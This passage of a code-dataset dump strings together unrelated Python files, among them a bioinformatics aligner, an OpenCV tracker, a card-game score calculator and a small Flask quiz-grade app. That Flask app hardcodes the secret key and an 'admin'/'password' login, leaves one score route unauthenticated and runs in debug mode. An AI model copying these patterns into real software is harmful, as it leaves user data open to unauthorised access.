test_dlkeys_from_invalid_shape(self):\n params = {\n \"resolution\": 30,\n \"tilesize\": 2048,\n \"pad\": 16,\n }\n shape = {\n \"type\": \"Point\",\n \"coordinates\": [\n -105.01621,\n 39.57422\n ]\n }\n with pytest.raises(InvalidShapeError):\n for t in Grid(**params).tiles_from_shape(shape):\n pass\n","sub_path":"descarteslabs/common/dltile/tests/test_dltiles.py","file_name":"test_dltiles.py","file_ext":"py","file_size_in_byte":7916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"8226816","text":"from flask import (Flask, render_template, redirect,\n session, url_for, request, g)\nfrom markupsafe import escape\n# from db import get_db\n# import os\nimport sqlite3\n\n\napp = Flask(__name__)\n# dbhere = os.path.join(app.instance_path, 'hw13.db')\n# Configure app, and displays database path\napp.config.from_mapping(\n SECRET_KEY='ultrastrongkey',\n # DATABASE=dbhere\n )\n\n\ndef get_db():\n db = getattr(g, '_database', None)\n if db is None:\n db = g._database = sqlite3.connect('hw13.db')\n db.row_factory = sqlite3.Row\n return db\n\n\n@app.teardown_appcontext\ndef close_connection(exception):\n db = getattr(g, '_database', None)\n if db is not None:\n db.close\n\n\n@app.before_request\ndef before_request():\n g.db = get_db()\n\n\n# Initializes and gets db\nwith app.app_context():\n db = get_db()\n\n\n@app.route('/')\ndef index():\n if 'username' in session:\n return \"\"\"Logged in as {}\n

    Dashboard

    \n \"\"\".format(escape(session['username']))\n return '''You are not logged in.\n

    Login

    \n '''\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n if request.method == 'POST':\n session['username'] = request.form['username']\n username = request.form['username']\n password = request.form['password']\n if username == 'admin' and password == 'password':\n return redirect(url_for('dashboard'))\n else:\n logout()\n return redirect(url_for('login'))\n else:\n return render_template('login.html')\n\n\n@app.route('/logout')\ndef logout():\n session.pop('username', None)\n return redirect(url_for('index'))\n\n\n@app.route('/dashboard', methods=['GET'])\ndef dashboard():\n if session['username'] == 'admin':\n if request.method == 'GET':\n studret = g.db.execute(\"SELECT * FROM students\").fetchall()\n quizret = g.db.execute(\"SELECT * FROM quizzes\").fetchall()\n\n # studlist = [\n # dict(First=r['firstname'],\n # Last=r['lastname'],\n # Studentid=r['id']) for r in studret\n # ]\n # quizzes = [\n # dict(quizid=quizret[0],\n # subject=quizret[1],\n # qs=quizret[2],\n # date=quizret[3])\n # ]\n\n return render_template('dashboard.html', students=studret,\n quizzes=quizret)\n return redirect(url_for('index'))\n\n\n@app.route('/student/add', methods=['GET', 'POST'])\ndef studentadd():\n if session['username'] == 'admin':\n if request.method == 'GET':\n return render_template('studentadd.html')\n if request.method == 'POST':\n try:\n addstu = (request.form[\"fname\"], request.form['lname'])\n g.db.execute(\"\"\"INSERT INTO students (firstname, lastname)\n VALUES (?, ?);\"\"\", (addstu),\n )\n g.db.commit()\n return redirect(url_for('dashboard'))\n except Exception as e:\n print(e)\n return render_template('studentadd.html')\n\n\n@app.route('/quiz/add', methods=['GET', 'POST'])\ndef quizadd():\n if session['username'] == 'admin':\n if request.method == 'GET':\n return render_template('quizadd.html')\n if request.method == 'POST':\n try:\n addqui = (request.form[\"subject\"], request.form['qs'],\n request.form['date'])\n g.db.execute(\"\"\"INSERT INTO quizzes (subject, qs, date)\n VALUES (?, ?, ?);\"\"\", (addqui),\n )\n g.db.commit()\n return redirect(url_for('dashboard'))\n except Exception as e:\n print(e)\n return render_template('quizadd.html')\n\n\n@app.route('/student/')\ndef quizscore(id):\n qscr = g.db.execute(\"\"\"\n SELECT quizzes.id, student_result.grade, quizzes.date\n FROM students JOIN student_result ON students.id =\n student_result.studentid\n JOIN quizzes ON student_result.quizid = quizzes.id\n WHERE students.id = ?\n \"\"\", [id]).fetchall()\n\n return render_template('studentscore.html', qscr=qscr)\n\n\n@app.route('/result/add', methods=['GET', 'POST'])\ndef resultadd():\n if session['username'] == 'admin':\n if request.method == 'GET':\n return render_template('resultadd.html')\n if request.method == 'POST':\n try:\n resultqui = (request.form[\"studentid\"], request.form['quizid'],\n request.form['grade'])\n g.db.execute(\"\"\"\n INSERT INTO student_result\n (studentid, quizid, grade)\n VALUES (?, ?, ?);\"\"\", (resultqui),\n )\n g.db.commit()\n return redirect(url_for('dashboard'))\n except Exception as e:\n print(e)\n return render_template('resultadd.html')\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"635531208","text":"from flask import Flask\nfrom flask import render_template\nfrom pymongo import MongoClient\nimport json\nimport os\n\n\napp = Flask(__name__)\n\nCOLLECTION_NAME = 'project2'\nMONGO_URI = os.getenv('MONGODB_URI')\nDBS_NAME = os.getenv('MONGO_DB_NAME')\n\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n\n@app.route(\"/data\")\ndef project():\n \"\"\"\n A Flask view to serve the googlePlay data from\n MongoDB in JSON format.\n \"\"\"\n\n # A constant that defines the record fields that we wish to retrieve.\n FIELDS = {\n '_id': False, 'Rating': False, 'Android Ver': False, 'Type': False, 'Current Ver': False\n }\n\n # Open a connection to MongoDB using a with statement such that the\n # connection will be closed as soon as we exit the with statement\n with MongoClient(MONGO_URI) as conn:\n # Define which collection we wish to access\n collection = conn[DBS_NAME][COLLECTION_NAME]\n # Retrieve a result set only with the fields defined in FIELD\n projects = collection.find(projection=FIELDS, limit=2000)\n # Convert projects to a list in a JSON object and return the JSON data\n return json.dumps(list(projects))\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"Stream2_project.py","file_name":"Stream2_project.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"87093749","text":"\"\"\"\nCreated by 陈辰柄 \ndatetime:2020/4/15 2:38\nDescribe:自动映射进行反射\n\"\"\"\n\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy import inspect,insert,create_engine\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy.sql import select, func\n\nBase = automap_base()\n\n\n\nengine = create_engine('sqlite:///Chinook_Sqlite.sqlite')\nmysql_engine = create_engine(\"mysql+mysqlconnector://root:@localhost:3306/guest\", pool_recycle=3600)\nBase.prepare(engine, reflect=True)\n\nBase.metadata.create_all(mysql_engine)\n\nArtist = Base.classes.Artist\nAlbum = Base.classes.Album\n\n\nsqlite_session = Session(engine)\nmysql_session = Session(mysql_engine)\n\n\ndef print_state(object):\n insp = inspect(object)\n for state in ['transient', 'pending', 'persistent', 'detached']:\n print('{:>10}: {}'.format(state, getattr(insp, state)))\n print()\n\n\nnums_sql = select([func.count(Artist.Name)])\nselect_Sql = select([Artist])\n\nconnection = engine.connect()\nmysql_connection = mysql_engine.connect()\n\nnums = connection.execute(nums_sql).first().count_1\nprint(nums)\n\nfor i in range(0, nums, 10):\n # select_Sql = select_Sql.slice(i, i + 1000).all()\n select_Sql = select_Sql.offset(i).limit(10)\n results = connection.execute(select_Sql)\n list_results=[tuple(i) for i in results]\n print(list_results)\n ins = insert(Artist).values(list_results)\n mysql_connection.execute(ins)\n","sub_path":"chapter_ten/chapter_ten.py","file_name":"chapter_ten.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"459305118","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef my_divHist(fr):\n\n y, x = fr.shape[0], fr.shape[1]\n div = 3\n divY, divX = y // div, x // div\n\n hist= []\n for i in range(div):\n for j in range(div):\n if(div == 2):\n fr_Blue = fr[i * divY: y, j * divX: x, 0].flatten()\n fr_Green = fr[i * divY: y, j * divX: x, 1].flatten()\n fr_Red = fr[i * divY: y, j * divX: x, 2].flatten()\n\n else :\n fr_Blue = fr[i * divY:(i + 1) * divY, j * divX: (j + 1) * divX, 0].flatten()\n fr_Green = fr[i * divY:(i + 1) * divY, j * divX:(j + 1) * divX, 1].flatten()\n fr_Red = fr[i * divY:(i + 1) * divY, j * divX:(j + 1) * divX, 2].flatten()\n\n fr_Blue = (fr_Blue / 32).astype(np.int64)\n fr_Green = (fr_Green / 32).astype(np.int64)\n fr_Red = (fr_Red / 32).astype(np.int64)\n\n fr_Blue_hist = np.bincount(fr_Blue, minlength=8)\n fr_Green_hist = np.bincount(fr_Green, minlength=8)\n fr_Red_hist = np.bincount(fr_Red, minlength=8)\n\n hist = np.concatenate((hist,fr_Blue_hist, fr_Green_hist, fr_Red_hist), axis=0)\n\n return hist\n\ndef my_hist(fr):\n\n fr_Blue = fr[:, :, 0].flatten()\n fr_Green = fr[:, :, 1].flatten()\n fr_Red = fr[:, :, 2].flatten()\n\n fr_Blue =(fr_Blue/32).astype(np.int64)\n fr_Green =(fr_Green/32).astype(np.int64)\n fr_Red = (fr_Red/32).astype(np.int64)\n\n fr_Blue_hist = np.bincount(fr_Blue, minlength=8)\n fr_Green_hist = np.bincount(fr_Green, minlength=8)\n fr_Red_hist = np.bincount(fr_Red, minlength=8)\n\n hist = np.concatenate((fr_Blue_hist, fr_Green_hist, fr_Red_hist), axis=0)\n return hist\n\ndef get_minDist(src, target, start):\n\n sy, sx = src.shape[0], src.shape[1]\n ty, tx = target.shape[0], target.shape[1]\n min = 10000000\n offset_y = start[0] if start[0] < sy-ty-20 else sy-ty-20\n offset_x = start[1] if start[1] < sx-tx-20 else sx-tx-20\n coord = (0,0,0,0)\n\n\n for i in range(offset_y-20, offset_y+20):\n for j in range(offset_x-20, offset_x+20):\n\n src_hist = my_hist(src[i:i+ty,j:j+tx])\n target_hist = my_hist(target[0:ty,0:tx])\n print(target_hist)\n\n square_dis = [(src_value - target_value)**2 for (src_value,target_value) in zip(src_hist, target_hist)]\n sum_list = [src_value + target_value for (src_value,target_value) in zip(src_hist, target_hist)]\n hist_distance = np.sum([square_value / sum_value for (square_value,sum_value) in zip(square_dis, sum_list) if sum_value != 0.])\n\n if (hist_distance < min):\n coord = (j, i, j + tx, i + ty)\n min = hist_distance\n\n return coord\n\nroi = None\ndrag_start = None\nmouse_status = 0\ntracking_strat = False\n\ndef onMouse(event, x, y, flags, param=None):\n global roi\n global drag_start\n global mouse_status\n global tracking_strat\n if event == cv2.EVENT_LBUTTONDOWN:\n drag_start = (x,y)\n mouse_status = 1\n tracking_strat = True\n elif event == cv2.EVENT_MOUSEMOVE:\n if flags == cv2.EVENT_FLAG_LBUTTON:\n xmin = min(x, drag_start[0])\n ymin = min(y, drag_start[1])\n xmax = max(x, drag_start[0])\n ymax = max(y, drag_start[1])\n roi = (xmin, ymin, xmax, ymax)\n mouse_status = 2\n elif event == cv2.EVENT_LBUTTONUP:\n mouse_status = 3\n\ncv2.namedWindow('tracking')\ncv2.setMouseCallback('tracking', onMouse)\ncap = cv2.VideoCapture('vtest.mp4')\nif not cap.isOpened():\n print('Error opening video')\nh, w = (int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT)), int(cap.get(cv2.CAP_PROP_FRAME_WIDTH)))\n\nfilename = 'tracking_video.avi'\nfps = cap.get(cv2.CAP_PROP_FPS)\nfourcc = cv2.VideoWriter_fourcc(*'DIVX')\nout = cv2.VideoWriter(filename, fourcc, fps, (int(w), int(h)))\n\nfr_roi = None\nwhile True:\n ret, frame = cap.read()\n if not ret:\n break\n\n if fr_roi is not None:\n x1,y1,x2,y2 = get_minDist(frame, fr_roi, start)\n start = (y1,x1)\n cv2.rectangle(frame,(x1,y1), (x2,y2), (255, 0,0), 2)\n if mouse_status == 2:\n x1,y1,x2,y2 = roi\n cv2.rectangle(frame, (x1,y1), (x2,y2), (255,0,0), 2)\n key = cv2.waitKey(100)\n if mouse_status == 3:\n mouse_status = 0\n x1, y1, x2, y2 = roi\n start = (y1,x1)\n fr_roi = frame[y1:y2, x1:x2]\n\n cv2.imshow('tracking', frame)\n out.write(frame)\n key = cv2.waitKey(100)\n if key == ord('c'):\n break\nif cap.isOpened():\n cap.release()\nout.release()\ncv2.destroyAllWindows()","sub_path":"my_hist for student.py","file_name":"my_hist for student.py","file_ext":"py","file_size_in_byte":4624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"519987080","text":"import time\r\nimport os\r\nimport math\r\n\r\n# Global variables\r\ngameComplete = \"n\" \r\nnumPlayersValid = \"n\"\r\nplayerNameList = []\r\nnumRounds = 10\r\nscoringComplete = 'n'\r\ncurrentRound = 1\r\nplayerScoreList = [0,0,0,0,0,0]\r\n\r\n# Print Applications banner information\r\nprint('Welcome to the Skull King Calculator')\r\nprint('Version 2.2')\r\nprint('Created by Tim Chaffin')\r\nprint('')\r\ntime.sleep(1)\r\n\r\n# User input section\r\nwhile gameComplete == \"n\":\r\n os.system('clear')\r\n score = 0\r\n \r\n while numPlayersValid == \"n\":\r\n print(\"How many players are playing?\")\r\n while True:\r\n try:\r\n numPlayers = int(input())\r\n except ValueError:\r\n print(\"Invalid number, try again.\")\r\n continue\r\n else:\r\n break\r\n \r\n if numPlayers > 6:\r\n print(\"You can only have a maximum of 6 players.\")\r\n numPlayersValid = \"n\"\r\n elif numPlayers < 2:\r\n print(\"You must have at least 2 players\")\r\n numPlayersValid = \"n\"\r\n else:\r\n numPlayersValid = \"y\"\r\n \r\n numNames = numPlayers\r\n os.system('clear')\r\n enterPlayerNum = 1\r\n \r\n while numNames > 0:\r\n print(\"Enter the name for player number\",enterPlayerNum,\":\")\r\n while True:\r\n try:\r\n playerName = input()\r\n except ValueError:\r\n print(\"Invalid input for player name, try again.\")\r\n continue\r\n else:\r\n break\r\n \r\n playerNameList.append(playerName)\r\n numNames = numNames - 1\r\n enterPlayerNum = enterPlayerNum + 1\r\n print(\"\")\r\n \r\n os.system('clear')\r\n currentRound = 1\r\n \r\n while currentRound <= numRounds:\r\n \r\n bidsTaken = numPlayers\r\n bidsPrinted = 0\r\n scoresPrinted = 0\r\n currentPlayerGuess = 0\r\n playerBids = []\r\n roundScored = 'f'\r\n \r\n print('Round Number:',currentRound)\r\n print('')\r\n print('Score Summary')\r\n if currentRound == 1:\r\n print('-First Round, No Scores Yet-') \r\n else:\r\n scoresPrinted = 0\r\n while scoresPrinted <= (numPlayers-1):\r\n print(playerNameList[scoresPrinted],\":\",playerScoreList[scoresPrinted])\r\n scoresPrinted = scoresPrinted + 1\r\n print(\"\")\r\n \r\n while bidsTaken > 0:\r\n print(\"Please enter the player bid count for\",playerNameList[currentPlayerGuess],\":\")\r\n while True:\r\n try:\r\n currentPlayerBid = int(input())\r\n except ValueError:\r\n print(\"Invalid input for player name, try again.\")\r\n continue\r\n else:\r\n break\r\n \r\n playerBids.append(currentPlayerBid)\r\n currentPlayerGuess = currentPlayerGuess + 1\r\n bidsTaken = bidsTaken - 1\r\n print(\"\")\r\n \r\n os.system('clear')\r\n \r\n print('Round Number:',currentRound)\r\n print('')\r\n print('Bid Summary')\r\n while bidsPrinted <= (numPlayers-1): \r\n print(playerNameList[bidsPrinted],':',playerBids[bidsPrinted])\r\n bidsPrinted = bidsPrinted + 1\r\n print('')\r\n print('Score Summary')\r\n if currentRound == 1:\r\n print('-First Round, No Scores Yet-') \r\n else:\r\n scoresPrinted = 0\r\n while scoresPrinted <= (numPlayers-1):\r\n print(playerNameList[scoresPrinted],\":\",playerScoreList[scoresPrinted])\r\n scoresPrinted = scoresPrinted + 1\r\n \r\n currentPlayerScored = 0\r\n \r\n while roundScored == 'f':\r\n print(\"\")\r\n print(\"Please enter the number of tricks won by\",playerNameList[currentPlayerScored],\":\")\r\n while True:\r\n try:\r\n currentPlayerTrick = int(input())\r\n except ValueError:\r\n print(\"Invalid input, try again.\")\r\n continue\r\n else:\r\n break\r\n if playerBids[currentPlayerScored] == 0:\r\n if currentPlayerTrick > 0:\r\n score = currentRound*-10\r\n print(playerNameList[currentPlayerScored],\"bid 0, with\", currentRound,\"card(s) dealt this round.\",playerNameList[currentPlayerScored],\"won one or more tricks. \",playerNameList[currentPlayerScored],\"loses\",abs(score), \"points.\")\r\n elif currentPlayerTrick == 0:\r\n score = currentRound*10\r\n print(playerNameList[currentPlayerScored],\"won\", score, \"points.\")\r\n elif playerBids[currentPlayerScored] > 0:\r\n if currentPlayerTrick == playerBids[currentPlayerScored]:\r\n score = playerBids[currentPlayerScored]*20 \r\n print(\"\")\r\n print(playerNameList[currentPlayerScored],\"won their bid\")\r\n print(\"\")\r\n print(playerNameList[currentPlayerScored],\"may earn bonus points by winning a trick in which three particular cards have been played.\") \r\n print('Was either the 14 of Yellow, 14 of Black or the Skull King Played? y/n')\r\n while True:\r\n try:\r\n bonusCards = input()\r\n if bonusCards not in('y','Y','n','N'):\r\n raise ValueError('Not a valid choice')\r\n except ValueError:\r\n print(\"Invalid input, try again.\")\r\n continue \r\n else:\r\n break \r\n if bonusCards in('y','Y'):\r\n print(\"Was the 14 of yellow card won? y/n\")\r\n while True: \r\n try:\r\n yellowCardWon = input()\r\n if yellowCardWon not in('y','Y','n','N'):\r\n raise ValueError('Not a valid choice')\r\n except ValueError:\r\n print(\"Invalid input, try again.\")\r\n continue\r\n else:\r\n break \r\n if yellowCardWon in('y','Y'):\r\n score = score + 10\r\n print(\"Was the 14 of black card won? y/n\")\r\n while True:\r\n try:\r\n blackCardWon = input()\r\n if blackCardWon not in('y','Y','n','N'):\r\n raise ValueError('Not a valid choice')\r\n except ValueError:\r\n print(\"Invalid input, try again.\")\r\n continue\r\n else:\r\n break\r\n if blackCardWon in('y','Y'):\r\n score = score + 20 \r\n print(\"Was the Skull King played? y/n\")\r\n while True:\r\n try:\r\n skullKing = input()\r\n if skullKing not in('y','Y','n','N'):\r\n raise ValueError('Not a valid choice')\r\n except ValueError:\r\n print(\"Invalid input, try again.\")\r\n continue\r\n else:\r\n break\r\n if skullKing in('y','Y'):\r\n print(\"\")\r\n print(\"The skull king scores a bonus of 30 points for every pirate card that was played in the same trick prior to the Skull King being played.\")\r\n print(\"How many pirate cards were played prior to the Skull King being played?\")\r\n while True:\r\n try:\r\n skullKingKilledPirates = int(input())\r\n except ValueError:\r\n print(\"Invalid input, try again.\")\r\n continue\r\n else:\r\n break \r\n if skullKingKilledPirates == 0:\r\n print(\"The Skull King did not take any pirate cards, and no bonus points are rewarded.\") \r\n elif skullKingKilledPirates > 0:\r\n score = score + skullKingKilledPirates*30 \r\n \r\n print(playerNameList[currentPlayerScored],\"won\", score, \"points\") \r\n else:\r\n score = ((playerBids[currentPlayerScored]-currentPlayerTrick)*10)*-1\r\n print(playerNameList[currentPlayerScored],\"lost\", abs(score), \"points\") \r\n \r\n playerScoreList[currentPlayerScored] = playerScoreList[currentPlayerScored]+score\r\n \r\n if currentPlayerScored == (numPlayers-1): \r\n roundScored = 't'\r\n else: \r\n currentPlayerScored = currentPlayerScored + 1\r\n print(\"\") \r\n \r\n print('Press Any Key To Continue:')\r\n waitForaBit = input()\r\n \r\n currentRound = currentRound + 1\r\n os.system('clear')\r\n \r\n print('Final Score Summary')\r\n scoresPrinted = 0\r\n while scoresPrinted <= (numPlayers-1):\r\n print(playerNameList[scoresPrinted],\":\",playerScoreList[scoresPrinted])\r\n scoresPrinted = scoresPrinted + 1\r\n gameComplete = 'y'","sub_path":"skullKingCalc.py","file_name":"skullKingCalc.py","file_ext":"py","file_size_in_byte":10010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"435511356","text":"import numpy as np\n\n\nclass GlobalAlignment:\n def __init__(self, string1, string2, gap_penalty, matrix):\n \"\"\"\n :param string1: first string to be aligned, string\n :param string2: second string to be aligned, string\n :param gap_penalty: gap penalty, integer\n :param matrix: substitution matrix containing scores for amino acid\n matches and mismatches, dict\n\n Attention! string1 is used to index columns, string2 is used to index rows\n \"\"\"\n self.string1 = string1\n self.string2 = string2\n self.gap_penalty = gap_penalty\n self.substitution_matrix = matrix\n self.score_matrix = np.zeros((len(string2) + 1, len(string1) + 1), dtype=np.int)\n self.alignments = []\n self.align()\n\n def align(self):\n \"\"\"\n Align given strings using the Needleman-Wunsch algorithm,\n store the alignments and the score matrix used to compute those alignments.\n NB: score matrix and the substitution matrix are different matrices!\n \"\"\"\n self.compute_score_matrix()\n self.compute_alignments()\n\n def compute_score_matrix(self):\n \"\"\"\n Initialize the score matrix.\n Fill the first row and the first column with gap penalties,\n then calculate the top score for each empty cell starting\n from top left.\n \"\"\"\n for column in range(len(self.string1) + 1):\n self.score_matrix[0, column] = self.gap_penalty * column\n for row in range(len(self.string2) + 1):\n self.score_matrix[row, 0] = self.gap_penalty * row\n\n for row in range(1, len(self.string2) + 1):\n for column in range(1, len(self.string1) + 1):\n match = (\n self.score_matrix[row - 1, column - 1]\n + self.substitution_matrix[self.string1[column - 1]][self.string2[row - 1]]\n )\n string1_insertion = (\n self.score_matrix[row - 1, column] + self.gap_penalty\n )\n string2_insertion = (\n self.score_matrix[row, column - 1] + self.gap_penalty\n )\n self.score_matrix[row, column] = max(\n match, string1_insertion, string2_insertion\n )\n\n def compute_alignments(self):\n string1_aligned = []\n string2_aligned = []\n row = len(self.string2)\n column = len(self.string1)\n self.alignments = self.process_cell(row,\n column,\n string1_aligned,\n string2_aligned)\n\n def process_cell(self, row, column, string1_aligned, string2_aligned):\n results = []\n if row == 0 and column == 0:\n string1_aligned.reverse()\n string2_aligned.reverse()\n return [(''.join(string1_aligned), ''.join(string2_aligned))]\n if row > 0 or column > 0:\n if (row > 0 and\n column > 0 and\n self.score_matrix[row, column] == self.score_matrix[row - 1, column - 1]\n + self.substitution_matrix[self.string1[column - 1]][self.string2[row - 1]]):\n results.extend(\n self.process_cell(\n row - 1,\n column - 1,\n string1_aligned + [self.string1[column - 1]],\n string2_aligned + [self.string2[row - 1]]\n )\n )\n if (row > 0 and\n self.score_matrix[row, column] == self.score_matrix[row - 1][column]\n + self.gap_penalty):\n # insertion into string1\n results.extend(\n self.process_cell(\n row - 1,\n column,\n string1_aligned + ['-'],\n string2_aligned + [self.string2[row - 1]]\n )\n )\n if (column > 0 and\n self.score_matrix[row, column] == self.score_matrix[row][column - 1]\n + self.gap_penalty):\n # insertion into string2\n results.extend(\n self.process_cell(\n row,\n column - 1,\n string1_aligned + [self.string1[column - 1]],\n string2_aligned + ['-']\n )\n )\n return results\n\n def get_best_score(self):\n \"\"\"\n :return: the highest score for the aligned strings, int\n\n \"\"\"\n return self.score_matrix[len(self.string2)][len(self.string1)]\n\n def get_number_of_alignments(self):\n \"\"\"\n :return: number of found alignments with the best score, int\n \"\"\"\n return len(self.alignments)\n\n def get_alignments(self):\n \"\"\"\n :return: list of alignments, where each alignment is represented\n as a tuple of aligned strings\n \"\"\"\n return self.alignments\n\n def get_score_matrix(self):\n \"\"\"\n :return: matrix built during the alignment process as a list of lists\n \"\"\"\n return self.score_matrix\n\n","sub_path":"codechecker/repos/3/collected_files/global_alignment/ga95suz.py","file_name":"ga95suz.py","file_ext":"py","file_size_in_byte":5347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"351064178","text":"import numpy as np\r\n#import tensorflow as tf\r\n#import tensorflow_quantum as tfq\r\n\r\nimport cirq\r\nimport sympy\r\nfrom cirq.contrib.svg import SVGCircuit\r\n\r\n#State class to initialise qubits and also to prepare intial hadamard state for the quibits\r\n\r\nclass states(object):\r\n \r\n def __init__(self, num_qubits, algo_name):\r\n \r\n self.algorithm = algo_name\r\n self.num_qubits = num_qubits\r\n #self.qubit_list = []\r\n self.gate_list = [\"hadamard\"]*num_qubits\r\n\r\n \r\n def get_qubits(self):\r\n\r\n #creates a list of qubit using list format to define cirq qubits\r\n #self.initial_qubit_list = cirq.LineQubit.range(self.num_qubits)\r\n #line_qubit doesn't serialize so use grid_qubit only to merge with tensorflow_quantum\r\n self.initial_qubit_list = cirq.GridQubit.rect(1,self.num_qubits)\r\n\r\n \r\n def get_params(self, num_params):\r\n \r\n #learnable params whose value is to be fed-----\r\n #a = init_name + \"_\" +str(1)\r\n #b = init_name + \"_\" +str(2) \r\n self.named_params = sympy.symbols('param_1, param_2')\r\n curr_iters = num_params-2\r\n for i in range(curr_iters):\r\n self.named_params += (sympy.symbols('param_'+str(i+3)),)\r\n return self.named_params\r\n\r\n\r\n \r\n def get_hadamard_basis_state(self, circuit):\r\n #outputs the hadamarded stae with initialised circuit given as input\r\n self.get_qubits()\r\n #Applying hadamard gates to the intial qubits\r\n print(type(cirq.H(self.initial_qubit_list[0])))\r\n for i in range(self.num_qubits):\r\n circuit.append(cirq.H(self.initial_qubit_list[i]))\r\n \r\n #plotting the circuit-----\r\n \r\n return circuit\r\n \r\n \r\n def apply_hadamard(self, num_qubits, qubits, circuit):\r\n #applies hadamard to a given set of qubits in the given circuit\r\n \r\n for i in range(num_qubits):\r\n circuit.append(cirq.H(qubits[i]))\r\n return circuit\r\n\r\n \r\n def apply_pauli_gate(self, num_qubits, qubits, circuit, gate_index):\r\n #applies pauli gates to a given set of qubits in the given circuit\r\n #gate_index --> 1 means Z gate and so on upto 3\r\n for i in range(num_qubits):\r\n if gate_index==0:\r\n circuit.append(cirq.Z(qubits[i]))\r\n elif gate_index==1:\r\n circuit.append(cirq.X(qubits[i]))\r\n else:\r\n circuit.append(cirq.Y(qubits[i]))\r\n\r\n return circuit\r\n\r\n def prepare_controlled_gate_state(self, num_qubits, qubits, circuit, gate_index):\r\n #apply controlled pauli gates between every consecutive qubits in the given set\r\n # gate_index--> means Z gate and so on upto 3 \r\n for i in range(num_qubits-1):\r\n if gate_index==0:\r\n circuit.append(cirq.CZ(qubits[i],qubits[i+1]))\r\n elif gate_index==1:\r\n circuit.append(cirq.CX(qubits[i],qubits[i+1]))\r\n else:\r\n circuit.append(cirq.CX(qubits[i],qubits[i+1]))\r\n\r\n return circuit\r\n \r\n\r\n \r\n def plot_circuit(self, circuit):\r\n #to plot the circuit at any moment\r\n print(\"The circuit is as folows-----> :)\")\r\n SVGCircuit(circuit)\r\n \r\n \r\n\r\n\r\n\r\n \r\n#Checking the state calss implementation \r\n\r\nif __name__==\"__main__\":\r\n curr_circuit = cirq.Circuit()\r\n state_class = states(4, \"Grover\")\r\n #state_class.get_qubits()\r\n state_class.get_hadamard_basis_state(curr_circuit)\r\n #state_class.plot_circuit(curr_circuit)\r\n SVGCircuit(curr_circuit)\r\n \r\n\r\n\r\n","sub_path":"Warm_Start_QAOA/State.py","file_name":"State.py","file_ext":"py","file_size_in_byte":3585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"554664588","text":"import random\n\nfrom jinja2 import Template\nfrom branca.element import Figure, MacroElement, Element\n\n\ndef random_point(min_lng, max_lng, min_lat, max_lat):\n lng = random.uniform(min_lng, max_lng)\n lat = random.uniform(min_lat, max_lat)\n return [lng, lat]\n\n\nclass DynamicGeoJson(MacroElement):\n \"\"\"GeoJson feature to consume live API data based on map bounds.\n\n Each time an event happen making the maps bound change, the four vertices of the map bounds will\n be saved in 4 variables: nW, nE, sE, sW. Using this 4 vertices, a API request can be made\n to provide geographic information that is present inside this map bound. This data is acquired\n by using leaflet .getBounds()\n ***Experimental***\n\n Parameters\n ----------\n action: str, default \"moveend\"\n What actions is need to performance in order to make a api call. For possible actions,\n See https://leafletjs.com/reference-1.4.0.html#map-zoomlevelschange\n url_root: str, default None\n The root of your api without the endpoint variables\n example: \"https://api.somesource/apiv1/\"\n url_pattern: str, default None\n This will be the endpoint pattern need to make the request, a python string but will be\n evaluate by javascript.\n See example bellow\n order: tuple, default (\"lng\", \"lat\")\n Order of the coordinates that present each point: (\"lng\", \"lat\") or (\"lat\", \"lng\")\n delimiter: str, default \",\"\n How lng and lat of each point is separated\n\n Examples\n --------\n # Create first the url:\n url_root = \"https://api.somesource/apiv1/\"\n # Will be allays 4 points available: nW, nE, sE, sW.\n # If all them are necessary and each joined by a '&', the pattern would be:\n url_pattern = \"nW+'&'+nE+'&'+sE+'&'+sW\"\n\n # Now we just need to create a new GeoJson layer and make it dynamically\n folium.GeoJson(geo_data, dynamic=folium.DynamicGeoJson(,\n url_root=url_root,\n url_pattern=url_pattern)).add_to(map)\n\n \"\"\"\n\n _template = Template(\n \"\"\"\n {% macro script(this, kwargs) %}\n\n // JS vars: Revision needed !!\n {% if this.live_update %}\n {{ this._parent.parent_map.get_name() }}.on(\"{{ this.action }}\",\n {% else %}\n $( \"#reload\" ).click({% endif %} function() {\n // This will get all map bounds and make all 2 points coordinates available for later use in API\n // call\n\n d = \"{{ this.delimiter }}\";\n latlng={{ this._parent.parent_map.get_name() }}.getBounds();\n nW = latlng._southWest.{{ this.order[0] }} + d + latlng._northEast.{{ this.order[1] }}\n nE = latlng._northEast.{{ this.order[0] }} + d + latlng._northEast.{{ this.order[1] }}\n sE = latlng._northEast.{{ this.order[0] }} + d + latlng._southWest.{{ this.order[1] }}\n sW = latlng._southWest.{{ this.order[0] }} + d + latlng._southWest.{{ this.order[1] }}\n\n // This will make a new rest api call.\n var opts = {{this.ajax | tojson}};\n opts.url = \"{{ this.url_root }}\" + {{ this.pattern }};\n opts.success = function(data) {\n {{ this._parent.get_name() }}.clearLayers();\n {{ this._parent.get_name() }}.addData(data);\n {% if this._parent._parent.get_name()|truncate(14, True, \"\") == \"marker_cluster\" %}\n {{ this._parent._parent.get_name() }}.clearLayers();\n {{ this._parent.get_name() }}.addTo({{ this._parent._parent.get_name() }});\n {% endif %}\n };\n $.ajax(opts);\n });\n\n {% endmacro %}\n \"\"\"\n )\n\n def __init__(\n self,\n action=\"moveend\",\n url_root=None,\n url_pattern=None,\n order=(\"lng\", \"lat\"),\n 